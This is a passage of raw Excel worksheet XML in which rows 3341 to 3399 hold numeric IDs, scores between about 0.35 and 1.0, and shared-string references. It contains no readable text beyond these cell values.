        <v>5592</v>
      </c>
      <c r="G3341" t="s">
        <v>6606</v>
      </c>
      <c r="H3341" t="s">
        <v>6607</v>
      </c>
    </row>
    <row r="3342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3342" s="1">
        <v>3340</v>
      </c>
      <c r="B3342">
        <v>4947</v>
      </c>
      <c r="C3342">
        <v>4947</v>
      </c>
      <c r="D3342">
        <v>2</v>
      </c>
      <c r="E3342">
        <v>0.98629999160766602</v>
      </c>
      <c r="F3342" t="s">
        <v>5592</v>
      </c>
      <c r="G3342" t="s">
        <v>6608</v>
      </c>
      <c r="H3342" t="s">
        <v>6609</v>
      </c>
    </row>
    <row r="3343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3343" s="1">
        <v>3341</v>
      </c>
      <c r="B3343">
        <v>4945</v>
      </c>
      <c r="C3343">
        <v>4945</v>
      </c>
      <c r="D3343">
        <v>2</v>
      </c>
      <c r="E3343">
        <v>0.80210000276565552</v>
      </c>
      <c r="F3343" t="s">
        <v>5592</v>
      </c>
      <c r="G3343" t="s">
        <v>6610</v>
      </c>
      <c r="H3343" t="s">
        <v>6611</v>
      </c>
    </row>
    <row r="3344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3344" s="1">
        <v>3342</v>
      </c>
      <c r="B3344">
        <v>4953</v>
      </c>
      <c r="C3344">
        <v>4953</v>
      </c>
      <c r="D3344">
        <v>2</v>
      </c>
      <c r="E3344">
        <v>0.99879997968673706</v>
      </c>
      <c r="F3344" t="s">
        <v>5592</v>
      </c>
      <c r="G3344" t="s">
        <v>6612</v>
      </c>
      <c r="H3344" t="s">
        <v>6613</v>
      </c>
    </row>
    <row r="3345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3345" s="1">
        <v>3343</v>
      </c>
      <c r="B3345">
        <v>5166</v>
      </c>
      <c r="C3345">
        <v>5166</v>
      </c>
      <c r="D3345">
        <v>2</v>
      </c>
      <c r="E3345">
        <v>0.62080001831054688</v>
      </c>
      <c r="F3345" t="s">
        <v>5592</v>
      </c>
      <c r="G3345" t="s">
        <v>6614</v>
      </c>
      <c r="H3345" t="s">
        <v>6615</v>
      </c>
    </row>
    <row r="3346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3346" s="1">
        <v>3344</v>
      </c>
      <c r="B3346">
        <v>4433</v>
      </c>
      <c r="C3346">
        <v>4433</v>
      </c>
      <c r="D3346">
        <v>2</v>
      </c>
      <c r="E3346">
        <v>0.99769997596740723</v>
      </c>
      <c r="F3346" t="s">
        <v>5592</v>
      </c>
      <c r="G3346" t="s">
        <v>6616</v>
      </c>
      <c r="H3346" t="s">
        <v>6617</v>
      </c>
    </row>
    <row r="3347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3347" s="1">
        <v>3345</v>
      </c>
      <c r="B3347">
        <v>5167</v>
      </c>
      <c r="C3347">
        <v>5167</v>
      </c>
      <c r="D3347">
        <v>2</v>
      </c>
      <c r="E3347">
        <v>0.99970000982284546</v>
      </c>
      <c r="F3347" t="s">
        <v>5592</v>
      </c>
      <c r="G3347" t="s">
        <v>6618</v>
      </c>
      <c r="H3347" t="s">
        <v>6619</v>
      </c>
    </row>
    <row r="3348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3348" s="1">
        <v>3346</v>
      </c>
      <c r="B3348">
        <v>4087</v>
      </c>
      <c r="C3348">
        <v>4087</v>
      </c>
      <c r="D3348">
        <v>2</v>
      </c>
      <c r="E3348">
        <v>0.35100001096725458</v>
      </c>
      <c r="F3348" t="s">
        <v>5592</v>
      </c>
      <c r="G3348" t="s">
        <v>6620</v>
      </c>
      <c r="H3348" t="s">
        <v>6621</v>
      </c>
    </row>
    <row r="3349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3349" s="1">
        <v>3347</v>
      </c>
      <c r="B3349">
        <v>6202</v>
      </c>
      <c r="C3349">
        <v>6202</v>
      </c>
      <c r="D3349">
        <v>2</v>
      </c>
      <c r="E3349">
        <v>0.7807999849319458</v>
      </c>
      <c r="F3349" t="s">
        <v>5592</v>
      </c>
      <c r="G3349" t="s">
        <v>6622</v>
      </c>
      <c r="H3349" t="s">
        <v>6623</v>
      </c>
    </row>
    <row r="3350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3350" s="1">
        <v>3348</v>
      </c>
      <c r="B3350">
        <v>5306</v>
      </c>
      <c r="C3350">
        <v>5306</v>
      </c>
      <c r="D3350">
        <v>2</v>
      </c>
      <c r="E3350">
        <v>0.77990001440048218</v>
      </c>
      <c r="F3350" t="s">
        <v>5592</v>
      </c>
      <c r="G3350" t="s">
        <v>6624</v>
      </c>
      <c r="H3350" t="s">
        <v>6625</v>
      </c>
    </row>
    <row r="3351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3351" s="1">
        <v>3349</v>
      </c>
      <c r="B3351">
        <v>5305</v>
      </c>
      <c r="C3351">
        <v>5305</v>
      </c>
      <c r="D3351">
        <v>2</v>
      </c>
      <c r="E3351">
        <v>0.99900001287460327</v>
      </c>
      <c r="F3351" t="s">
        <v>5592</v>
      </c>
      <c r="G3351" t="s">
        <v>6626</v>
      </c>
      <c r="H3351" t="s">
        <v>6627</v>
      </c>
    </row>
    <row r="3352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3352" s="1">
        <v>3350</v>
      </c>
      <c r="B3352">
        <v>5304</v>
      </c>
      <c r="C3352">
        <v>5304</v>
      </c>
      <c r="D3352">
        <v>2</v>
      </c>
      <c r="E3352">
        <v>0.55879998207092285</v>
      </c>
      <c r="F3352" t="s">
        <v>5592</v>
      </c>
      <c r="G3352" t="s">
        <v>6628</v>
      </c>
      <c r="H3352" t="s">
        <v>6629</v>
      </c>
    </row>
    <row r="3353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3353" s="1">
        <v>3351</v>
      </c>
      <c r="B3353">
        <v>4096</v>
      </c>
      <c r="C3353">
        <v>4096</v>
      </c>
      <c r="D3353">
        <v>2</v>
      </c>
      <c r="E3353">
        <v>0.99489998817443848</v>
      </c>
      <c r="F3353" t="s">
        <v>5592</v>
      </c>
      <c r="G3353" t="s">
        <v>6630</v>
      </c>
      <c r="H3353" t="s">
        <v>6631</v>
      </c>
    </row>
    <row r="3354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3354" s="1">
        <v>3352</v>
      </c>
      <c r="B3354">
        <v>4097</v>
      </c>
      <c r="C3354">
        <v>4097</v>
      </c>
      <c r="D3354">
        <v>2</v>
      </c>
      <c r="E3354">
        <v>0.99779999256134033</v>
      </c>
      <c r="F3354" t="s">
        <v>5592</v>
      </c>
      <c r="G3354" t="s">
        <v>6632</v>
      </c>
      <c r="H3354" t="s">
        <v>6633</v>
      </c>
    </row>
    <row r="3355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3355" s="1">
        <v>3353</v>
      </c>
      <c r="B3355">
        <v>4104</v>
      </c>
      <c r="C3355">
        <v>4104</v>
      </c>
      <c r="D3355">
        <v>2</v>
      </c>
      <c r="E3355">
        <v>0.74059998989105225</v>
      </c>
      <c r="F3355" t="s">
        <v>5592</v>
      </c>
      <c r="G3355" t="s">
        <v>6634</v>
      </c>
      <c r="H3355" t="s">
        <v>6635</v>
      </c>
    </row>
    <row r="3356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3356" s="1">
        <v>3354</v>
      </c>
      <c r="B3356">
        <v>4106</v>
      </c>
      <c r="C3356">
        <v>4106</v>
      </c>
      <c r="D3356">
        <v>2</v>
      </c>
      <c r="E3356">
        <v>0.99000000953674316</v>
      </c>
      <c r="F3356" t="s">
        <v>5592</v>
      </c>
      <c r="G3356" t="s">
        <v>6636</v>
      </c>
      <c r="H3356" t="s">
        <v>6637</v>
      </c>
    </row>
    <row r="3357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3357" s="1">
        <v>3355</v>
      </c>
      <c r="B3357">
        <v>6192</v>
      </c>
      <c r="C3357">
        <v>6192</v>
      </c>
      <c r="D3357">
        <v>2</v>
      </c>
      <c r="E3357">
        <v>0.58270001411437988</v>
      </c>
      <c r="F3357" t="s">
        <v>5592</v>
      </c>
      <c r="G3357" t="s">
        <v>6638</v>
      </c>
      <c r="H3357" t="s">
        <v>6639</v>
      </c>
    </row>
    <row r="3358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3358" s="1">
        <v>3356</v>
      </c>
      <c r="B3358">
        <v>5300</v>
      </c>
      <c r="C3358">
        <v>5300</v>
      </c>
      <c r="D3358">
        <v>2</v>
      </c>
      <c r="E3358">
        <v>0.61150002479553223</v>
      </c>
      <c r="F3358" t="s">
        <v>5592</v>
      </c>
      <c r="G3358" t="s">
        <v>6640</v>
      </c>
      <c r="H3358" t="s">
        <v>6641</v>
      </c>
    </row>
    <row r="3359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3359" s="1">
        <v>3357</v>
      </c>
      <c r="B3359">
        <v>6191</v>
      </c>
      <c r="C3359">
        <v>6191</v>
      </c>
      <c r="D3359">
        <v>2</v>
      </c>
      <c r="E3359">
        <v>0.99889999628067017</v>
      </c>
      <c r="F3359" t="s">
        <v>5592</v>
      </c>
      <c r="G3359" t="s">
        <v>6642</v>
      </c>
      <c r="H3359" t="s">
        <v>6643</v>
      </c>
    </row>
    <row r="3360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3360" s="1">
        <v>3358</v>
      </c>
      <c r="B3360">
        <v>4116</v>
      </c>
      <c r="C3360">
        <v>4116</v>
      </c>
      <c r="D3360">
        <v>2</v>
      </c>
      <c r="E3360">
        <v>0.77460002899169922</v>
      </c>
      <c r="F3360" t="s">
        <v>5592</v>
      </c>
      <c r="G3360" t="s">
        <v>6644</v>
      </c>
      <c r="H3360" t="s">
        <v>6645</v>
      </c>
    </row>
    <row r="3361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3361" s="1">
        <v>3359</v>
      </c>
      <c r="B3361">
        <v>4117</v>
      </c>
      <c r="C3361">
        <v>4117</v>
      </c>
      <c r="D3361">
        <v>2</v>
      </c>
      <c r="E3361">
        <v>0.91939997673034668</v>
      </c>
      <c r="F3361" t="s">
        <v>5592</v>
      </c>
      <c r="G3361" t="s">
        <v>6646</v>
      </c>
      <c r="H3361" t="s">
        <v>6647</v>
      </c>
    </row>
    <row r="3362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3362" s="1">
        <v>3360</v>
      </c>
      <c r="B3362">
        <v>4118</v>
      </c>
      <c r="C3362">
        <v>4118</v>
      </c>
      <c r="D3362">
        <v>2</v>
      </c>
      <c r="E3362">
        <v>0.98949998617172241</v>
      </c>
      <c r="F3362" t="s">
        <v>5592</v>
      </c>
      <c r="G3362" t="s">
        <v>6648</v>
      </c>
      <c r="H3362" t="s">
        <v>6649</v>
      </c>
    </row>
    <row r="3363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3363" s="1">
        <v>3361</v>
      </c>
      <c r="B3363">
        <v>5310</v>
      </c>
      <c r="C3363">
        <v>5310</v>
      </c>
      <c r="D3363">
        <v>2</v>
      </c>
      <c r="E3363">
        <v>0.45960000157356262</v>
      </c>
      <c r="F3363" t="s">
        <v>5592</v>
      </c>
      <c r="G3363" t="s">
        <v>6650</v>
      </c>
      <c r="H3363" t="s">
        <v>6651</v>
      </c>
    </row>
    <row r="3364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3364" s="1">
        <v>3362</v>
      </c>
      <c r="B3364">
        <v>4083</v>
      </c>
      <c r="C3364">
        <v>4083</v>
      </c>
      <c r="D3364">
        <v>2</v>
      </c>
      <c r="E3364">
        <v>0.54640001058578491</v>
      </c>
      <c r="F3364" t="s">
        <v>5592</v>
      </c>
      <c r="G3364" t="s">
        <v>6652</v>
      </c>
      <c r="H3364" t="s">
        <v>6653</v>
      </c>
    </row>
    <row r="3365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3365" s="1">
        <v>3363</v>
      </c>
      <c r="B3365">
        <v>4081</v>
      </c>
      <c r="C3365">
        <v>4081</v>
      </c>
      <c r="D3365">
        <v>2</v>
      </c>
      <c r="E3365">
        <v>0.97030001878738403</v>
      </c>
      <c r="F3365" t="s">
        <v>5592</v>
      </c>
      <c r="G3365" t="s">
        <v>6654</v>
      </c>
      <c r="H3365" t="s">
        <v>6655</v>
      </c>
    </row>
    <row r="3366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3366" s="1">
        <v>3364</v>
      </c>
      <c r="B3366">
        <v>5312</v>
      </c>
      <c r="C3366">
        <v>5312</v>
      </c>
      <c r="D3366">
        <v>2</v>
      </c>
      <c r="E3366">
        <v>0.50970000028610229</v>
      </c>
      <c r="F3366" t="s">
        <v>5592</v>
      </c>
      <c r="G3366" t="s">
        <v>6656</v>
      </c>
      <c r="H3366" t="s">
        <v>6657</v>
      </c>
    </row>
    <row r="3367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3367" s="1">
        <v>3365</v>
      </c>
      <c r="B3367">
        <v>4051</v>
      </c>
      <c r="C3367">
        <v>4051</v>
      </c>
      <c r="D3367">
        <v>2</v>
      </c>
      <c r="E3367">
        <v>0.60680001974105835</v>
      </c>
      <c r="F3367" t="s">
        <v>5592</v>
      </c>
      <c r="G3367" t="s">
        <v>6658</v>
      </c>
      <c r="H3367" t="s">
        <v>6659</v>
      </c>
    </row>
    <row r="3368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3368" s="1">
        <v>3366</v>
      </c>
      <c r="B3368">
        <v>6223</v>
      </c>
      <c r="C3368">
        <v>6223</v>
      </c>
      <c r="D3368">
        <v>2</v>
      </c>
      <c r="E3368">
        <v>0.70109999179840088</v>
      </c>
      <c r="F3368" t="s">
        <v>5592</v>
      </c>
      <c r="G3368" t="s">
        <v>6660</v>
      </c>
      <c r="H3368" t="s">
        <v>6661</v>
      </c>
    </row>
    <row r="3369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3369" s="1">
        <v>3367</v>
      </c>
      <c r="B3369">
        <v>6218</v>
      </c>
      <c r="C3369">
        <v>6218</v>
      </c>
      <c r="D3369">
        <v>2</v>
      </c>
      <c r="E3369">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3369" t="s">
        <v>5592</v>
      </c>
      <c r="G3369" t="s">
        <v>6662</v>
      </c>
      <c r="H3369" t="s">
        <v>6493</v>
      </c>
    </row>
    <row r="3370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3370" s="1">
        <v>3368</v>
      </c>
      <c r="B3370">
        <v>6217</v>
      </c>
      <c r="C3370">
        <v>6217</v>
      </c>
      <c r="D3370">
        <v>2</v>
      </c>
      <c r="E3370">
        <v>0.54129999876022339</v>
      </c>
      <c r="F3370" t="s">
        <v>5592</v>
      </c>
      <c r="G3370" t="s">
        <v>6663</v>
      </c>
      <c r="H3370" t="s">
        <v>6664</v>
      </c>
    </row>
    <row r="3371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3371" s="1">
        <v>3369</v>
      </c>
      <c r="B3371">
        <v>5698</v>
      </c>
      <c r="C3371">
        <v>5698</v>
      </c>
      <c r="D3371">
        <v>2</v>
      </c>
      <c r="E3371">
        <v>0.98619997501373291</v>
      </c>
      <c r="F3371" t="s">
        <v>5592</v>
      </c>
      <c r="G3371" t="s">
        <v>6665</v>
      </c>
      <c r="H3371" t="s">
        <v>6666</v>
      </c>
    </row>
    <row r="3372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3372" s="1">
        <v>3370</v>
      </c>
      <c r="B3372">
        <v>6215</v>
      </c>
      <c r="C3372">
        <v>6215</v>
      </c>
      <c r="D3372">
        <v>2</v>
      </c>
      <c r="E3372">
        <v>0.94239997863769531</v>
      </c>
      <c r="F3372" t="s">
        <v>5592</v>
      </c>
      <c r="G3372" t="s">
        <v>6667</v>
      </c>
      <c r="H3372" t="s">
        <v>6668</v>
      </c>
    </row>
    <row r="3373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3373" s="1">
        <v>3371</v>
      </c>
      <c r="B3373">
        <v>4060</v>
      </c>
      <c r="C3373">
        <v>4060</v>
      </c>
      <c r="D3373">
        <v>2</v>
      </c>
      <c r="E3373">
        <v>0.98960000276565552</v>
      </c>
      <c r="F3373" t="s">
        <v>5592</v>
      </c>
      <c r="G3373" t="s">
        <v>6669</v>
      </c>
      <c r="H3373" t="s">
        <v>6670</v>
      </c>
    </row>
    <row r="3374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3374" s="1">
        <v>3372</v>
      </c>
      <c r="B3374">
        <v>4120</v>
      </c>
      <c r="C3374">
        <v>4120</v>
      </c>
      <c r="D3374">
        <v>2</v>
      </c>
      <c r="E3374">
        <v>0.83780002593994141</v>
      </c>
      <c r="F3374" t="s">
        <v>5592</v>
      </c>
      <c r="G3374" t="s">
        <v>6671</v>
      </c>
      <c r="H3374" t="s">
        <v>6672</v>
      </c>
    </row>
    <row r="3375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3375" s="1">
        <v>3373</v>
      </c>
      <c r="B3375">
        <v>6213</v>
      </c>
      <c r="C3375">
        <v>6213</v>
      </c>
      <c r="D3375">
        <v>2</v>
      </c>
      <c r="E3375">
        <v>0.59369999170303345</v>
      </c>
      <c r="F3375" t="s">
        <v>5592</v>
      </c>
      <c r="G3375" t="s">
        <v>6673</v>
      </c>
      <c r="H3375" t="s">
        <v>6674</v>
      </c>
    </row>
    <row r="3376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3376" s="1">
        <v>3374</v>
      </c>
      <c r="B3376">
        <v>6211</v>
      </c>
      <c r="C3376">
        <v>6211</v>
      </c>
      <c r="D3376">
        <v>2</v>
      </c>
      <c r="E3376">
        <v>0.85670000314712524</v>
      </c>
      <c r="F3376" t="s">
        <v>5592</v>
      </c>
      <c r="G3376" t="s">
        <v>6675</v>
      </c>
      <c r="H3376" t="s">
        <v>6676</v>
      </c>
    </row>
    <row r="3377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3377" s="1">
        <v>3375</v>
      </c>
      <c r="B3377">
        <v>4068</v>
      </c>
      <c r="C3377">
        <v>4068</v>
      </c>
      <c r="D3377">
        <v>2</v>
      </c>
      <c r="E3377">
        <v>0.90719997882843018</v>
      </c>
      <c r="F3377" t="s">
        <v>5592</v>
      </c>
      <c r="G3377" t="s">
        <v>6677</v>
      </c>
      <c r="H3377" t="s">
        <v>6678</v>
      </c>
    </row>
    <row r="3378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3378" s="1">
        <v>3376</v>
      </c>
      <c r="B3378">
        <v>4069</v>
      </c>
      <c r="C3378">
        <v>4069</v>
      </c>
      <c r="D3378">
        <v>2</v>
      </c>
      <c r="E3378">
        <v>0.99809998273849487</v>
      </c>
      <c r="F3378" t="s">
        <v>5592</v>
      </c>
      <c r="G3378" t="s">
        <v>6679</v>
      </c>
      <c r="H3378" t="s">
        <v>6680</v>
      </c>
    </row>
    <row r="3379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3379" s="1">
        <v>3377</v>
      </c>
      <c r="B3379">
        <v>4070</v>
      </c>
      <c r="C3379">
        <v>4070</v>
      </c>
      <c r="D3379">
        <v>2</v>
      </c>
      <c r="E3379">
        <v>0.98940002918243408</v>
      </c>
      <c r="F3379" t="s">
        <v>5592</v>
      </c>
      <c r="G3379" t="s">
        <v>6681</v>
      </c>
      <c r="H3379" t="s">
        <v>6682</v>
      </c>
    </row>
    <row r="3380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3380" s="1">
        <v>3378</v>
      </c>
      <c r="B3380">
        <v>6210</v>
      </c>
      <c r="C3380">
        <v>6210</v>
      </c>
      <c r="D3380">
        <v>2</v>
      </c>
      <c r="E3380">
        <v>0.99379998445510864</v>
      </c>
      <c r="F3380" t="s">
        <v>5592</v>
      </c>
      <c r="G3380" t="s">
        <v>6683</v>
      </c>
      <c r="H3380" t="s">
        <v>6684</v>
      </c>
    </row>
    <row r="3381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3381" s="1">
        <v>3379</v>
      </c>
      <c r="B3381">
        <v>5704</v>
      </c>
      <c r="C3381">
        <v>5704</v>
      </c>
      <c r="D3381">
        <v>2</v>
      </c>
      <c r="E3381">
        <v>0.50950002670288086</v>
      </c>
      <c r="F3381" t="s">
        <v>5592</v>
      </c>
      <c r="G3381" t="s">
        <v>6685</v>
      </c>
      <c r="H3381" t="s">
        <v>6686</v>
      </c>
    </row>
    <row r="3382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3382" s="1">
        <v>3380</v>
      </c>
      <c r="B3382">
        <v>6208</v>
      </c>
      <c r="C3382">
        <v>6208</v>
      </c>
      <c r="D3382">
        <v>2</v>
      </c>
      <c r="E3382">
        <v>0.99210000038146973</v>
      </c>
      <c r="F3382" t="s">
        <v>5592</v>
      </c>
      <c r="G3382" t="s">
        <v>6687</v>
      </c>
      <c r="H3382" t="s">
        <v>6688</v>
      </c>
    </row>
    <row r="3383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3383" s="1">
        <v>3381</v>
      </c>
      <c r="B3383">
        <v>4063</v>
      </c>
      <c r="C3383">
        <v>4063</v>
      </c>
      <c r="D3383">
        <v>2</v>
      </c>
      <c r="E3383">
        <v>0.98900002241134644</v>
      </c>
      <c r="F3383" t="s">
        <v>5592</v>
      </c>
      <c r="G3383" t="s">
        <v>6689</v>
      </c>
      <c r="H3383" t="s">
        <v>6690</v>
      </c>
    </row>
    <row r="3384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3384" s="1">
        <v>3382</v>
      </c>
      <c r="B3384">
        <v>4123</v>
      </c>
      <c r="C3384">
        <v>4123</v>
      </c>
      <c r="D3384">
        <v>2</v>
      </c>
      <c r="E3384">
        <v>0.45730000734329218</v>
      </c>
      <c r="F3384" t="s">
        <v>5592</v>
      </c>
      <c r="G3384" t="s">
        <v>6691</v>
      </c>
      <c r="H3384" t="s">
        <v>6692</v>
      </c>
    </row>
    <row r="3385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3385" s="1">
        <v>3383</v>
      </c>
      <c r="B3385">
        <v>4124</v>
      </c>
      <c r="C3385">
        <v>4124</v>
      </c>
      <c r="D3385">
        <v>2</v>
      </c>
      <c r="E3385">
        <v>0.99239999055862427</v>
      </c>
      <c r="F3385" t="s">
        <v>5592</v>
      </c>
      <c r="G3385" t="s">
        <v>6693</v>
      </c>
      <c r="H3385" t="s">
        <v>6694</v>
      </c>
    </row>
    <row r="3386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3386" s="1">
        <v>3384</v>
      </c>
      <c r="B3386">
        <v>4126</v>
      </c>
      <c r="C3386">
        <v>4126</v>
      </c>
      <c r="D3386">
        <v>2</v>
      </c>
      <c r="E3386">
        <v>0.99750000238418579</v>
      </c>
      <c r="F3386" t="s">
        <v>5592</v>
      </c>
      <c r="G3386" t="s">
        <v>6695</v>
      </c>
      <c r="H3386" t="s">
        <v>6696</v>
      </c>
    </row>
    <row r="3387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3387" s="1">
        <v>3385</v>
      </c>
      <c r="B3387">
        <v>5287</v>
      </c>
      <c r="C3387">
        <v>5287</v>
      </c>
      <c r="D3387">
        <v>2</v>
      </c>
      <c r="E3387">
        <v>0.62589997053146362</v>
      </c>
      <c r="F3387" t="s">
        <v>5592</v>
      </c>
      <c r="G3387" t="s">
        <v>6697</v>
      </c>
      <c r="H3387" t="s">
        <v>6698</v>
      </c>
    </row>
    <row r="3388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3388" s="1">
        <v>3386</v>
      </c>
      <c r="B3388">
        <v>4170</v>
      </c>
      <c r="C3388">
        <v>4170</v>
      </c>
      <c r="D3388">
        <v>2</v>
      </c>
      <c r="E3388">
        <v>0.84030002355575562</v>
      </c>
      <c r="F3388" t="s">
        <v>5592</v>
      </c>
      <c r="G3388" t="s">
        <v>6699</v>
      </c>
      <c r="H3388" t="s">
        <v>6700</v>
      </c>
    </row>
    <row r="3389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3389" s="1">
        <v>3387</v>
      </c>
      <c r="B3389">
        <v>4171</v>
      </c>
      <c r="C3389">
        <v>4171</v>
      </c>
      <c r="D3389">
        <v>2</v>
      </c>
      <c r="E3389">
        <v>0.93440002202987671</v>
      </c>
      <c r="F3389" t="s">
        <v>5592</v>
      </c>
      <c r="G3389" t="s">
        <v>6701</v>
      </c>
      <c r="H3389" t="s">
        <v>6702</v>
      </c>
    </row>
    <row r="3390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3390" s="1">
        <v>3388</v>
      </c>
      <c r="B3390">
        <v>4172</v>
      </c>
      <c r="C3390">
        <v>4172</v>
      </c>
      <c r="D3390">
        <v>2</v>
      </c>
      <c r="E3390">
        <v>0.98489999771118164</v>
      </c>
      <c r="F3390" t="s">
        <v>5592</v>
      </c>
      <c r="G3390" t="s">
        <v>6703</v>
      </c>
      <c r="H3390" t="s">
        <v>6704</v>
      </c>
    </row>
    <row r="3391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3391" s="1">
        <v>3389</v>
      </c>
      <c r="B3391">
        <v>6170</v>
      </c>
      <c r="C3391">
        <v>6170</v>
      </c>
      <c r="D3391">
        <v>2</v>
      </c>
      <c r="E3391">
        <v>0.68709999322891235</v>
      </c>
      <c r="F3391" t="s">
        <v>5592</v>
      </c>
      <c r="G3391" t="s">
        <v>6705</v>
      </c>
      <c r="H3391" t="s">
        <v>6706</v>
      </c>
    </row>
    <row r="3392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3392" s="1">
        <v>3390</v>
      </c>
      <c r="B3392">
        <v>6169</v>
      </c>
      <c r="C3392">
        <v>6169</v>
      </c>
      <c r="D3392">
        <v>2</v>
      </c>
      <c r="E3392">
        <v>0.75669997930526733</v>
      </c>
      <c r="F3392" t="s">
        <v>5592</v>
      </c>
      <c r="G3392" t="s">
        <v>6707</v>
      </c>
      <c r="H3392" t="s">
        <v>6708</v>
      </c>
    </row>
    <row r="3393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3393" s="1">
        <v>3391</v>
      </c>
      <c r="B3393">
        <v>6168</v>
      </c>
      <c r="C3393">
        <v>6168</v>
      </c>
      <c r="D3393">
        <v>2</v>
      </c>
      <c r="E3393">
        <v>0.72839999198913574</v>
      </c>
      <c r="F3393" t="s">
        <v>5592</v>
      </c>
      <c r="G3393" t="s">
        <v>6709</v>
      </c>
      <c r="H3393" t="s">
        <v>6710</v>
      </c>
    </row>
    <row r="3394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3394" s="1">
        <v>3392</v>
      </c>
      <c r="B3394">
        <v>4167</v>
      </c>
      <c r="C3394">
        <v>4167</v>
      </c>
      <c r="D3394">
        <v>2</v>
      </c>
      <c r="E3394">
        <v>0.7523999810218811</v>
      </c>
      <c r="F3394" t="s">
        <v>5592</v>
      </c>
      <c r="G3394" t="s">
        <v>6711</v>
      </c>
      <c r="H3394" t="s">
        <v>6712</v>
      </c>
    </row>
    <row r="3395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3395" s="1">
        <v>3393</v>
      </c>
      <c r="B3395">
        <v>6167</v>
      </c>
      <c r="C3395">
        <v>6167</v>
      </c>
      <c r="D3395">
        <v>2</v>
      </c>
      <c r="E3395">
        <v>0.99819999933242798</v>
      </c>
      <c r="F3395" t="s">
        <v>5592</v>
      </c>
      <c r="G3395" t="s">
        <v>6713</v>
      </c>
      <c r="H3395" t="s">
        <v>6714</v>
      </c>
    </row>
    <row r="3396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3396" s="1">
        <v>3394</v>
      </c>
      <c r="B3396">
        <v>5284</v>
      </c>
      <c r="C3396">
        <v>5284</v>
      </c>
      <c r="D3396">
        <v>2</v>
      </c>
      <c r="E3396">
        <v>0.52740001678466797</v>
      </c>
      <c r="F3396" t="s">
        <v>5592</v>
      </c>
      <c r="G3396" t="s">
        <v>6715</v>
      </c>
      <c r="H3396" t="s">
        <v>6716</v>
      </c>
    </row>
    <row r="3397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3397" s="1">
        <v>3395</v>
      </c>
      <c r="B3397">
        <v>4182</v>
      </c>
      <c r="C3397">
        <v>4182</v>
      </c>
      <c r="D3397">
        <v>2</v>
      </c>
      <c r="E3397">
        <v>0.99830001592636108</v>
      </c>
      <c r="F3397" t="s">
        <v>5592</v>
      </c>
      <c r="G3397" t="s">
        <v>6717</v>
      </c>
      <c r="H3397" t="s">
        <v>6718</v>
      </c>
    </row>
    <row r="3398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3398" s="1">
        <v>3396</v>
      </c>
      <c r="B3398">
        <v>4183</v>
      </c>
      <c r="C3398">
        <v>4183</v>
      </c>
      <c r="D3398">
        <v>2</v>
      </c>
      <c r="E3398">
        <v>0.54369997978210449</v>
      </c>
      <c r="F3398" t="s">
        <v>5592</v>
      </c>
      <c r="G3398" t="s">
        <v>6719</v>
      </c>
      <c r="H3398" t="s">
        <v>6720</v>
      </c>
    </row>
    <row r="3399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3399" s="1">
        <v>3397</v>
      </c>
      <c r="B3399">
        <v>6163</v>
      </c>
      <c r="C3399">
        <v>6163</v>
      </c>
      <c r="D3399">
        <v>2</v>
      </c>
      <c r="E3399">
        <v>0.97359997034072876</v>
      </c>
      <c r="F3399" t="s">
        <v>5592</v>
      </c>
      <c r="G3399" t="s">
        <v>6721</v>
      </c>
      <c r="H3399" t="s">
        <v>6722</v>
      </c>
    </row>
